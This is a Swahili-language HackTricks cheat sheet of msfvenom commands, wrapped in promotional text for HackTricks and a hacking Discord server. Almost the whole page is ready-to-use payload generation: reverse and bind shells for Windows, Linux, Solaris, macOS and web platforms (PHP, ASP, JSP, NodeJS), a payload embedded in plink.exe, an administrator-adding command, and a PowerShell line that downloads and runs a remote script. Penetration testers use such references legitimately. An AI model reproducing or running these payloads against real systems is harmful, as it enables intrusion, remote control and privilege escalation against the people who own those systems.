Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa zawadi za mdudu!
Machapisho ya Udukuzi
Shiriki na maudhui yanayochimba kina kuhusu msisimko na changamoto za udukuzi
Taarifa za Udukuzi za Muda Halisi
Kaa up-to-date na ulimwengu wa udukuzi wenye kasi kupitia taarifa za muda halisi na ufahamu
Matangazo ya Karibuni
Baki mwelekezwa na zawadi za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!
Msingi wa msfvenom
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
Mtu pia anaweza kutumia -a
kufafanua usanifu au --platform
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
Vigezo vya kawaida wakati wa kuunda shellcode
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
Windows
Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
Bind Shell
Bind Shell
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
Unda Mtumiaji
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
Kifupi cha CMD
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
Tekeleza Amri
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
Msimbazaji
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Imejumuishwa ndani ya faili ya kutekelezeka
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
Malipo ya Nyuma
Ganda la Nyuma
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
Bind Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
SunOS (Solaris)
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
Malipo ya MAC
Kifundo cha Nyuma:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
Malipo ya Wavuti yanayotegemea
PHP
Shell ya Nyuma
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP/x
Reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
JSP
Reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
Mizigo ya Lugha ya Script
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
Python
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za makosa ya usalama!
Machapisho ya Kudukua
Shiriki na yaliyomo yanayochimba kina katika msisimko na changamoto za kudukua
Taarifa za Kudukua za Muda Halisi
Kaa sasa na ulimwengu wa kudukua wenye kasi kupitia taarifa za muda halisi na ufahamu
Matangazo ya Karibuni
Baki mwelewa na tuzo za makosa za hivi karibuni zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!
Jifunze kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!